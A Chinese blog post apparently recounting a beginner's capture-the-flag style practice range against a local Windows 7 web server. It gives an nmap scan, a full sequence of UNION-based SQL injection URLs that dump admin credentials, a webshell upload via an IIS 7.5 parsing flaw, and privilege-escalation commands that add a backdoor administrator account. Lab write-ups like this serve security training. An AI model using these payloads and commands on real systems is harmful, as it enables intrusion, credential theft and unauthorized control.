记第一次实战靶场的经验

前言:
这个靶场是我们学长发给我的一个练习靶场,我中间也是失败了好几次才成功打完这个靶场,虽然过程不是特别的顺利,但是通关之后还是很开心,毕竟我在安全方面还是一个小白,通过这次实战也获得了很多经验。下面我们就来看看通关这个靶场的过程吧。

渗透测试流程
信息收集->目标分析->实施攻击->提权->痕迹清除
信息收集:
IP、端口(服务)、目录扫描、CMS(指纹识别)->历史漏洞、子域名->更多的服务、Goby->资产收集(华为路由、海康威视、FOFA、钟馗之眼、Google黑语法)
目标分析:
查看各个功能
实施攻击:
SQL注入
闭合->查看字段->查看显示位->查基本信息(数据库名称、版本号)->表名(table_name)->字段名(column)->敏感数据

攻击机:windows 10
被攻击机(肉机):windows 7->开启web服务
1、我们先在虚拟机上开启被攻击机。
 
2、我们在本机打开命令行查看Windows 7 的IP。
 
3、我们获取到IP之后可以用namp进行主机的探活,然后我们就可以获取到目标主机的IP  192.168.182.183
 
4、获取到目标主机的IP之后我们在浏览器中访问一下。
 
5、访问了目标主机的IP之后,我们可以进行一个端口的探测(查看开放了哪些端口等等。)
nmap -sS -n -A -T4 -p- 192.168.182.183
-sS 指定某个协议
-n  防止反解析
-A  探测目标主机的版本及操作系统
-T4  快速扫描
-p-  指定IP,对所有端口进行探测
 
6、打开站点,任意复制一张图像地址,然后逐一删减查看(主要是为了查看是否存在目录遍历漏洞),但是这个靶场不存在目录遍历漏洞。然后我们随便进入一个页面,发现我们进入的这个页面是由一个参数控制的,这里我们可以尝试使用文件包含漏洞(本地文件包含和远程文件包含),SQL注入等漏洞。
 
7、我们经过尝试之后发现了SQL注入漏洞(我们在url中输入单引号后报错),而且我们从报错信息中获取到应该是用)闭合。
 
8、接下来我们尝试SQL注入。
(1)判断是否存在SQL注入
http://192.168.182.183/index.php?s=/news/6) and 1=1-- -
http://192.168.182.183/index.php?s=/news/6) and 1=2-- -
(2)猜解字段数
http://192.168.182.183/index.php?s=/news/6) order by 7-- -     (该数据库有7个字段)
(3)查看显示位
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,7-- -
(4)猜解数据库名
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,database()-- -
(5)猜解表名
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
(6)猜解列名
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='tpx_admin_user'-- -
(7)猜解数据
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(username,0x7e,password) from tpx_admin_user-- -
我们获取到了第一个flag1: flag~ XTDXANDLDXY
9、然后我们尝试进入管理后台(在url中输入admin.php),在这之前我们可以使用目录扫描工具扫描该页面存在的目录,我们可以看到有一个admin.php目录。
 
10、我们利用SQL注入爆破出来的用户名和密码登录 admin~VFZSSmVrNUVWVEpaYlhneFdsRTlQUT09,但是密码是base64二次解密后的结果  MTIzNDU2Ymx1ZQ==

成功进入管理后台之后,为了拿到目标主机权限,寻找文件上传点,并利用IIS7.5文件解析漏洞上传木马。
 
注意:我们打开这个页面后发现文件上传点未加载,需要使用burp suite配置
 
发现目标主机为IIS7.5,尝试使用IIS7.5文件解析漏洞进行攻击
 
使用蚁剑连接,发现C盘根目录存在flag2.txt /   flag{ajkwncalwrli}

然后我们进行渗透,使用CS自带的ms16-016一键提权或者上传可执行文件
eop.exe "net user mark mark123+++ /add"
eop.exe "net localgroup adminisrators mark /add"
 
 
之后我们可以连接远程桌面获得flag3  / cjdhrncalzos
注:实战中的情况千变万化,我们需要不断地尝试去寻找突破,虽然过程有些许的复杂,但是成功之后也会获得慢慢的成就感。
       若其中有不对的地方,希望大佬们能够提一些建议。
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值